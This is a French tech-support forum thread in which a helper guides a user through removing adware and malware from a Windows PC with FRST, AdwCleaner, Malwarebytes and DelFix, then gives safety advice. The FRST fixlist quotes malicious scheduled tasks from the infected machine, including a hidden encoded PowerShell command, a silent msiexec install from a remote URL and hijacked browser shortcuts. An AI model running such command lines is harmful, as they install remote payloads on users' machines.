    2017-03-10 08:54 - 2017-03-10 08:54 - 0016224 _____ () C:\Users\benjamin clarens\AppData\Roaming\InstallationConfiguration.xml
    2017-03-10 08:54 - 2017-03-10 08:54 - 0140288 _____ () C:\Users\benjamin clarens\AppData\Roaming\Installer.dat
    2017-02-23 23:44 - 2017-02-23 23:44 - 1620992 _____ () C:\ProgramData\service.exe
    2017-02-23 23:43 - 2017-02-24 22:53 - 0326144 _____ () C:\ProgramData\smp2.exe
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) <==== ATTENTION
    Task: {10F23E8F-DE66-43CA-9390-0737EF5056C1} - System32\Tasks\Microsoft\Windows\Media Center\VCore => C:\\ProgramData\\vCore\\VCore.exe [2017-02-21] () <==== ATTENTION
    Task: {1D2EB95E-AFCC-4E16-8A52-18409AE839DB} - System32\Tasks\KMS => C:\Windows\Setup\Office.bat [2010-05-20] () <==== ATTENTION
    Task: {201511A2-25A4-42CE-9106-C2F542B8BC24} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
    Task: {210790A2-8E07-4A4D-A19B-0F36A46F9B2C} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-02-24] () <==== ATTENTION
    Task: {2DE4C509-EF94-4D23-9325-2240039DB323} - System32\Tasks\Fix It Task => C:\Program Files (x86)\FixIt\FixItMonitor.exe [2016-12-26] ()
    Task: {30089918-832E-4BA9-B06C-378E28C5187E} - System32\Tasks\19OX7lo687 => C:\Program Files (x86)\W4ZYsxEVVq\updengine.exe [2017-03-14] () <==== ATTENTION
    Task: {4084E09F-D759-45BE-B612-EAA1768237C6} - System32\Tasks\Windows-PG => powershell.exe C:\Update\psgo\psgo.ps1
    Task: {43E44993-2293-4A13-B77C-9AAF44359D64} - System32\Tasks\{4D2C0FF9-8BBB-ACF0-7946-B44E948B5B09} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\2156f633\7d54c356.dll" <==== ATTENTION
    Task: {52C861A6-5C2A-4952-9471-16D2518C0C7D} - System32\Tasks\Fix It Run Delay => C:\Program Files (x86)\FixIt\FixIt.exe [2016-12-26] ()
    Task: {75FCEFB4-584A-499E-9060-11D017B36B52} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Pas de fichier <==== ATTENTION
    Task: {775690F0-7594-4A7C-A718-14F48948748E} - System32\Tasks\FixItPeriod => C:\Program Files (x86)\FixIt\FixIt.exe [2016-12-26] ()
    Task: {78962C71-5126-4CA2-AFF3-94FC1FB348F6} - System32\Tasks\Yahoo! Powered toril => Wscript.exe "C:\ProgramData\{080BCD68-8249-47AE-048F-D9EC9ECD5222}\fofa.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b30383042434436382d383234392d343741452d303438462d4439454339454344353232327d5c73696c696e69" "433a5c50726f6772616d446174615c7b30383042434436382d383234392d343741452d303438 (l'élément de données a 78 caractères en plus).
    Task: {7B469467-2328-4AA2-8C8C-D966E5A3F359} - System32\Tasks\{0E780847-0C7F-7A7A-0511-047E7E7E117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAIAAgADsAIAAgADsAIAAgADsAOwA7ADsAIAA7ADsAIAA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4A (l'élément de données a 9732 caractères en plus). <==== ATTENTION
    Task: {B3B9622A-8B7C-49FE-BBCB-FBB525F8A9B6} - System32\Tasks\Arowige => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=3219913727_263907_C6F43FE3&v=2017223 /q <==== ATTENTION
    Task: {B7CBAB1C-D1A6-4009-9198-206DED9443CF} - System32\Tasks\{A53B684B-1290-DFE0-CF57-EAC0B124E679} => C:\ProgramData\{3AAB57A7-8D00-E00C-103C-F8EDD04E49E4}\A26A92C9-15C1-2562-B288-2BCB601B2172.exe [2017-04-16] () <==== ATTENTION
    Task: {CDFC6CD6-8E96-4FD0-9682-030836A76D54} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-03-21] (IEC) <==== ATTENTION
    Task: {DE39F4C8-B9BD-4D54-946B-181E04226B59} - System32\Tasks\Fix It Monitor => C:\Program Files (x86)\FixIt\FixItConsole.exe [2016-12-26] ()
    Task: {E6152E85-BF38-4475-BBF2-E2F4664B05AA} - System32\Tasks\{37CABACD-C366-0A28-F905-3574B403E869} => C:\Users\benjamin clarens\AppData\Roaming\{1FD7296C-3A85-441A-51B3-63C88D619EF6}\Sync.exe [2013-04-10] () <==== ATTENTION
    Task: C:\WINDOWS\Tasks\FixItPeriod.job =>
    Task: C:\WINDOWS\Tasks\Yahoo! Powered toril.job => Wscript.exe C:\ProgramData\{080BCD68-8249-47AE-048F-D9EC9ECD5222}\fofa.txt <==== ATTENTION
    Task: C:\WINDOWS\Tasks\{37CABACD-C366-0A28-F905-3574B403E869}.job => C:\Users\BENJAM~1\AppData\Roaming\{1FD72~1\Sync.exe <==== ATTENTION
    ShortcutWithArgument: C:\Users\benjamin clarens\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\Users\benjamin clarens\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Chromium.lnk -> C:\Users\benjamin clarens\AppData\Local\Chromium\Application\chrome.exe (The Chromium Authors) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\Users\benjamin clarens\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\Users\benjamin clarens\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,"
    ShortcutWithArgument: C:\Users\benjamin clarens\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\Users\benjamin clarens\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files\internet explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h2nztrmbl10au,0461d6a1-c7de-4ece-aae0-3487628d1817,
    2017-02-23 23:42 - 2017-04-03 15:06 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
    2017-02-23 23:42 - 2017-02-23 23:42 - 00307712 _____ () C:\Program Files (x86)\Showeckshefik Manager\local64spl.dll
    2017-03-08 11:09 - 2017-03-31 10:18 - 00239104 _____ () C:\Users\benjamin clarens\AppData\Roaming\Kyubey\Kyubey.exe
    2017-02-23 23:42 - 2017-02-23 23:42 - 00470592 _____ () C:\WINDOWS\SysWOW64\NetUtils2016.exe
    2017-03-30 18:43 - 2017-03-29 06:28 - 00107696 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    2017-02-23 23:43 - 2017-02-23 23:43 - 02072064 _____ () C:\Users\benjamin clarens\AppData\Local\Temp\00004038\msiql.exe
    2016-12-26 11:49 - 2016-12-26 11:49 - 01485464 _____ () C:\Program Files (x86)\FixIt\FixItMonitor.exe
    2017-04-16 18:40 - 2017-04-16 18:40 - 02002944 _____ () C:\ProgramData\{3AAB57A7-8D00-E00C-103C-F8EDD04E49E4}\A26A92C9-15C1-2562-B288-2BCB601B2172.exe
    2017-03-13 22:46 - 2017-03-13 22:46 - 01009152 _____ () C:\Program Files (x86)\W4ZYsxEVVq\kl.dll
    2016-06-28 11:16 - 2016-06-28 11:16 - 00318976 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\WebChimera.js.node
    2016-06-28 11:17 - 2016-06-28 11:17 - 00137776 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\libvlc.dll
    2016-06-28 11:18 - 2016-06-28 11:18 - 02626096 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\libvlccore.dll
    2016-06-28 11:18 - 2016-06-28 11:18 - 00549424 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\plugins\access\libdshow_plugin.dll
    2016-06-28 11:18 - 2016-06-28 11:18 - 00036400 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\plugins\audio_output\libdirectsound_plugin.dll
    2016-06-28 11:18 - 2016-06-28 11:18 - 00034352 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\plugins\audio_output\libwaveout_plugin.dll
    2016-06-28 11:18 - 2016-06-28 11:18 - 00080944 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\plugins\video_output\libdirect3d_plugin.dll
    2016-06-28 11:18 - 2016-06-28 11:18 - 00072752 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\WCjs\plugins\video_output\libdirectdraw_plugin.dll
    2016-06-28 11:17 - 2016-06-28 11:17 - 01583640 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\libglesv2.dll
    2016-06-28 11:17 - 2016-06-28 11:17 - 00014360 _____ () C:\Users\benjamin clarens\AppData\Local\Programs\LNV\Stremio\libegl.dll
    2017-02-24 22:54 - 2017-02-24 22:54 - 01850880 _____ () C:\ProgramData\2156f633\7d54c356.dll
    2017-03-30 18:44 - 2017-03-09 07:31 - 02187096 _____ () C:\Program Files (x86)\Hotcine\Application\libglesv2.dll
    2017-03-30 18:44 - 2017-03-09 07:31 - 00086360 _____ () C:\Program Files (x86)\Hotcine\Application\libegl.dll
    2017-04-12 10:02 - 2017-03-31 11:49 - 17778776 _____ () C:\Users\benjamin clarens\AppData\Local\Hotcine\User Data\PepperFlash\25.0.0.148\pepflashplayer.dll
    DNS Servers: 82.163.143.157 - 82.163.142.159
    FirewallRules: [UDP Query User{E69F7936-C4AB-4231-883D-2B5800DC003A}C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe] => (Block) C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe
    FirewallRules: [TCP Query User{7CD1F4D1-6009-4F02-8377-16C7C2FEA55E}C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe] => (Block) C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe
    FirewallRules: [UDP Query User{14230B2F-619A-47FD-98D2-1A5F771E133E}C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe
    FirewallRules: [TCP Query User{5696E34C-E8E9-420A-B2D8-D1B181E2561F}C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\benjamin clarens\appdata\roaming\cacaoweb\cacaoweb.exe
    FirewallRules: [{ACB4F90C-F3C0-41D2-8E01-06639095C641}] => (Allow) C:\Users\benjamin clarens\AppData\Local\Chromium\Application\chrome.exe
    FirewallRules: [{FB9CA54F-336E-49B7-A98C-A30312286769}] => (Allow) C:\Windows\Setup\Keygen.exe
    FirewallRules: [UDP Query User{0498DCE0-1742-47CA-8EFF-7B6A4EE2E988}C:\users\benjamin clarens\appdata\local\programs\lnv\stremio\stremio.exe] => (Allow) C:\users\benjamin clarens\appdata\local\programs\lnv\stremio\stremio.exe
    FirewallRules: [TCP Query User{4221CE1C-D3DB-484C-91C7-80A7B684003A}C:\users\benjamin clarens\appdata\local\programs\lnv\stremio\stremio.exe] => (Allow) C:\users\benjamin clarens\appdata\local\programs\lnv\stremio\stremio.exe
    FirewallRules: [TCP Query User{297D0418-BA2D-403A-A691-FBC5D83B3EE7}C:\program files (x86)\amulell\amule.exe] => (Block) C:\program files (x86)\amulell\amule.exe
    FirewallRules: [UDP Query User{56F7A2D8-3CF0-4A9D-8FE7-F7AC10B7CC6C}C:\program files (x86)\amulell\amule.exe] => (Block) C:\program files (x86)\amulell\amule.exe
    FirewallRules: [TCP Query User{7BAA2CB7-0779-45F8-8970-DB2563197C8A}C:\program files (x86)\amulell\amule.exe] => (Allow) C:\program files (x86)\amulell\amule.exe
    FirewallRules: [UDP Query User{F0E1A852-76F7-499B-993A-3828FBE96B97}C:\program files (x86)\amulell\amule.exe] => (Allow) C:\program files (x86)\amulell\amule.exe
    FirewallRules: [{DB0B5DDE-A6E2-40BE-B853-E441BEAB2934}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    FirewallRules: [{0E594B59-04C1-418B-B01B-2DEFBA22B1F0}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
    FirewallRules: [{F2788669-4517-466C-82F7-1530A3B4D269}] => (Allow) C:\Program Files (x86)\Hotcine\Application\chrome.exe
    C:\Program Files\INWWM2OFMJ
    C:\Program Files\DAG1UJI6CY
    C:\Program Files\HMZ19LB4IV
    C:\Program Files\UB6GHKH5HS
    C:\Program Files\7MOMK01QAH
    C:\Program Files\OZQAYGWY34
    C:\Program Files\8UCBB5FQ22
    C:\Program Files\4JXXYLK6X6
    C:\Program Files\ZXF4PPAPSP
    C:\Program Files\2G5Q3J5DA7
    C:\Program Files\2JW8ZQH5P3
    C:\Program Files\IWGH70LEGR
    C:\Program Files (x86)\FixIt
    C:\Users\benjamin clarens\AppData\Roaming\gplyra
    c:\users\benjamin clarens\appdata\local\chromium
    C:\Users\benjamin clarens\AppData\Roaming\cacaoweb
    C:\Program Files (x86)\Showeckshefik Manager
    C:\Users\benjamin clarens\AppData\Roaming\Kyubey
    C:\WINDOWS\system32\drivers\dc6dc7d702d89aa0e337959f07d94a0a.sys
    C:\WINDOWS\System32\drivers\Lace_wpf_x64.sys
    C:\WINDOWS\system32\drivers\NetUtils2016.sys
    C:\\ProgramData\\vCore
    C:\Windows\Setup\Office.bat
    C:\Program Files (x86)\MIO
    C:\ProgramData\2156f633
    C:\ProgramData\{080BCD68-8249-47AE-048F-D9EC9ECD5222}
    C:\ProgramData\{3AAB57A7-8D00-E00C-103C-F8EDD04E49E4}
    C:\Windows\Setup\Keygen.exe
    C:\Program Files (x86)\Platcerhesy
    C:\Program Files (x86)\Chopik
    cmd: ipconfig /flushdns
    EmptyTemp:
    end


    • Enregistre le fichier Sur ton BureaU (au même endroit que FRST) sous le nom fixlist.txt
    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur FRST.exe
    • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction



    • Le pc va demander à redémarrer, accepte.
    • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.


  • /!\ Ce script a été établi pour cet utilisateur, il n'est pas compatible avec un autre système/utilisateur et ne
    doit pas être utilisé même pour des symptômes identiques /!\



    *************************

    ******Est attendus , le rapport :******

    --> Fixlog.txt
    m
    0
    l
    18 Avril 2017 23:21:46

    Bonjour Misterybean,
    Voici le lien vers le fichier Fixlog: https://up.security-x.fr/file.php?h=Rc325296cbc6462aeaf...
    Ca semble aller depuis les manipulations, j'attends ton avis quant au rapport en croisant les doigts.
    Je suis preneur de tes conseils quant aux antivirus ou autres outils de protection efficaces à ta connaissance.
    Merci pour ta précieuse aide.
    m
    0
    l
    19 Avril 2017 11:23:22

    Bonjour,

    Citation :
    Je suis preneur de tes conseils quant aux antivirus ou autres outils de protection efficaces à ta connaissance.


    Il faut savoir que le meilleur antivirus c'est TOI , en effet , lors d'installation de programmes , il faut vérifier TOUT ce qui est
    coché par défaut avant chaque appui sur SUIVANT , car selon les sites de téléchargement , les programmes sont repackés
    avec des "Sponsors" , c'est la grande majorité de ce que tu avais sur le PC .
    C'est pour cela qu'il faut toujours télécharger les programmes sur le site de l'éditeur et surtout tenir ses programmes à jour .
    On verras ça plus en détail en fin de désinfection


    ********************************

    Ok pour le rapport , je pense que ça lui a fait du bien ! , On va continuer le nettoyage :


    AdwCleaner - Analyser : /!\ Mode recherche uniquement

    • Télécharge AdwCleaner de Malwarebytes et enregistre le fichier sur ton Bureau
      Patiente le temps que ton navigateur te propose le téléchargement à enregistrer, sans cliquer nulle part, surtout pas sur les sponsors de la page
    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur l'icône AdwCleaner.exe pour lancer l'outil
      /!\ Sous Vista, Windows 7, 8 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, clique sur Analyser
    • Les éléments détectés s'affichent dans les différents onglets. Clique sur Rapport
    • Un rapport AdwCleaner(Sx).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
      Le rapport se trouve sous C:\AdwCleaner\AdwCleaner(Sx).txt (ou C:\Program Files (x86)\AdwCleaner)


  • Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

    Si ton antivirus émet une alerte ou bloque l'outil, il faut le désactiver temporairement (le fichier AdwCleaner.exe est sûr)

    Tutoriel d'utilisation AdwCleaner en images

    --------------------------------------------------------------------------------------------------------------

    Est attendus le rapport :
    AdwCleaner-Analyser

    :) 
    m
    0
    l
    19 Avril 2017 12:49:52

    Re,

    OK, nous continuons le nettoyage.

    --------------------------------------------------------------------------------------------------------------

    AdwCleaner - Nettoyer :

    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur l'icône AdwCleaner.exe pour lancer l'outil
      /!\ Sous Vista, Windows 7, 8 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, clique sur Analyser
    • Les éléments détectés s'affichent dans les différents onglets. Clique sur Nettoyer et valide par OK la fermeture des programmes
    • Patiente le temps de l'analyse et valide le message d'informations
    • Un redémarrage est demandé, valider par OK
    • Au redémarrage, un rapport AdwCleaner(Cx).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
      Le rapport se trouve sous C:\AdwCleaner\AdwCleaner(Sx).txt (ou C:\Program Files (x86)\AdwCleaner)


  • Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

    Si ton antivirus émet une alerte ou bloque l'outil, il faut le désactiver temporairement (le fichier AdwCleaner.exe est sûr)

    Tutoriel d'utilisation AdwCleaner en images


    --------------------------------------------------------------------------------------------------------------

    Malwarebytes Anti-Malware :

    • Télécharge Malwarebytes Anti-Malware (version gratuite) et enregistre le sur le Bureau
    • Double-clique sur le fichier mb3-setup-consumer.exe pour lancer l'installation
      /!\ Sous Vista, Windows 7, 8 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • La version Premium est automatiquement installée pour un essai gratuit de 14 jours
    • Clique sur Terminer. Malwarebytes s'ouvre

    • Si dans Etat de l'analyse, Mises à jour est orange, cliquer sur la flèche tournante
    • Dans Paramètres, puis Protection, sélectionne Traiter les détections comme des malveillants pour les détections PUP et PUM
    • Dans Analyse, clique sur Analyse des Menaces puis clique sur Lancer l'analyse
    • Patiente le temps de l'analyse
    • En fin d'analyse, clique sur Afficher les résultats d'analyse
    • Pour supprimer les éléments détectés, veille à ce que tous les éléments détectés soient cochés puis clique sur Quarantaine sélectionnée
    • Un résumé d'analyse s'affiche. Clique sur Exporter le résumé puis sur Fichier texte (*.txt) pour enregistrer le rapport d'analyse
    • Enregistre le rapport sur ton Bureau. Poste ce rapport dans ta prochaine réponse
      Si un redémarrage est demandé, valide par Oui et laisse le système redémarrer.
      Le journal d'examen est aussi enregistré sous C:\ProgramData\Malwarebytes\Malwarebytes' Anti-Malware\Logs


  • Tutoriel d'utilisation Malwarebytes en images

    --------------------------------------------------------------------------------------------------------------

    Sont attendus les rapports
    AdwCleaner-Nettoyer
    Malwarebytes


    Indique moi ensuite comment se comporte le système par rapport aux symptômes signalés au début ?

    @+
    m
    0
    l
    19 Avril 2017 18:53:19

    Re_

    Tu n'as pas poster les rapport Malwarebytes

    et répondu à Indique moi ensuite comment se comporte le système par rapport aux symptômes signalés au début ?

    :) 
    m
    0
    l
    19 Avril 2017 22:23:04

    Re_

    Vide la quarantaine de Malwarebytes :

    --> Lance Malwarebytes (clic droit exécuter en tant qu'administrateur)
    --> Dans l'onglet Quarantaine, vérifie que tout est coché , puis clique sur Supprimer


    ********************

    Réactivation de l'UAC

    Dans recherche/cortana , tape Contrôle de compte --> Cliques sur Modifier les paramètres de contrôle de compte d'utilisateur
    Dans la fenêtre qui s'ouvre , monte le curseur sur le troisième trait puis OK

    ********************


    Relance un scan FRST et poste les rapports FRST et Addition

    :) 
    m
    0
    l
    20 Avril 2017 16:06:55

    Bonjour ,

    il reste des traces à supprimer :

    • Ouvre le Bloc-notes Touches Windows + R , tape notepad puis valide (touche entrée)
    • Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes



  • start
    CreateRestorePoint:
    CloseProcesses:
    Task: {0AF4497F-DFC5-412A-A2A1-E8821B77B244} - System32\Tasks\Showeckshefik Manager => C:\Program Files (x86)\Platcerhesy\dclebsy.exe
    C:\Program Files (x86)\Platcerhesy
    EmptyTemp:
    end



    • Enregistre le fichier Sur ton BureaU (au même endroit que FRST) sous le nom fixlist.txt
    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur FRST.exe
    • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction



    • Le pc va demander à redémarrer, accepte.
    • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.


  • /!\ Ce script a été établi pour cet utilisateur, il n'est pas compatible avec un autre système/utilisateur et ne
    doit pas être utilisé même pour des symptômes identiques /!\



    *************************

    ******Est attendus , le rapport :******

    --> Fixlog.txt
    m
    0
    l

    Meilleure solution

    20 Avril 2017 18:18:37


    Bonjour ,

    Il semble que tu ait mis à jour Acrobat Reader DC . Se faisant , tu as fait exactement ce qui a fait que ton Pc soit
    autant infecté , c'est à dire ne pas décocher les sponsors .
    Dans le cas d'Adobe , ce n'est pas trop grave , à part que cela peut créer des conflits entre programmes de protection .
    Donc , prendre l'habitude de bien regarder ce qui est cochée avant de cliquer (plus d'infos dans la conclusion)

    Pour illustrer :

    Clique sur l'image pour agrandir

    Tu peux donc désinstaller McAfee Security Scan Plus

    ***************************

    Tes rapports sont Ok , si tu n'as plus de problèmes , on peut conclure :

    Télécharge DelFix (de Xplode) sur ton bureau.


    • Ferme toutes tes fenêtres, puis double clique sur DelFix.exe pour le lancer.
      (Sous Vista et ultèrieur faire clic droit -> "Exécuter en tant qu'administrateur")
    • Cochez les cases :
    • Supprimer les outils de désinfection
    • Purger la restauration système
    • Clique sur le bouton "Exécuter"
    • Laisse travailler l'outil.
    • Le rapport est enregistré dans à la base de ton disque dur, (C:\DelFix.txt généralement) merci de copier-coller son contenu dans ta prochaine réponse.



  • -------------------------------------------------------------------------------------------------------


    Comme dit en début de procédure :

    1 - tu as été infecté avec ton consentement , tu dois faire attention aux options cochés par défaut lors de l'installation de programmes , et privilégier le site de l'éditeur pour le téléchargement de ces derniers
    2 - Vérifie toujours toutes les pièces jointes ou les fichiers compressés grâce à ton antivirus (clic droit --> Analyser)
    3 - Garde toujours ton système à jour ainsi que tout les programmes (Internet explorer / Java / Produit Adobe / etc...)
    4 - Évite l’exécution automatique des médias (Clé USB - HDD externe - CD/DVD - Etc... )
    5 - Évite le P2P et les cracks , tu peux lire ceci pour en apprendre plus :


  • Un petit peu de lecture pour savoir pourquoi et comment tu as été infecté et comment l'éviter :

  • ************************************

    En résumé


    • Il faut éviter les comportements à risques (cracks/keygens, P2P, streaming illégal, pornographie, etc.)
    • Privilégier les sites des éditeurs pour télécharger les programmes
    • Toujours vérifier les options cochés par défaut lors de l'installation des programmes.
    • Garder son système à jour (Windows et logiciels)
    • Faire des sauvegardes régulières de ses données sur des supports externes .




  • Pour t'entrainer à ne pas te faire à nouveau infecter . Utilise cet outil :


    • Télécharge Adware Prevention (de guigui0001) sur ton bureau.
    • Lance-le en double-cliquant dessus. Cet outil va simuler une installation bourrée d'adwares. Fais alors en sorte, tout au long de la pseudo-installation, de ne pas te faire piéger en étant vigilant.
    • A la fin de cette fausse installation, l'outil fait un bilan de tes décisions. Suis attentivement les conseils qu'il te donne.
    • Adopte alors la même vigilance lors de tes futures installations, qui seront réelles cette fois-ci !


  • Tutoriel en images


    Pour en savoir plus, clique sur l'image pour télécharger ce PDF


    ********************************


    Tu peux passer ce sujet en Résolu en cliquant sur le bouton Sélectionner comme meilleure solution (en bas d'une de mes réponses),
    ton sujet sera alors automatiquement marqué comme Résolu.

    @+
    partage
    21 Avril 2017 11:29:21

    Bonjour ,

    Tu as remis le fichier fixlog au lieu de Delfix.txt

    Citation :
    Le rapport est enregistré dans à la base de ton disque dur, (C:\DelFix.txt généralement) merci de copier-coller son contenu dans ta prochaine réponse.


    :) 
    m
    0
    l
    21 Avril 2017 12:08:13

    Re_

    Ok , cest tout bon

    Bonne continuation .... et prudence sur le net :) 
    m
    0
    l
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS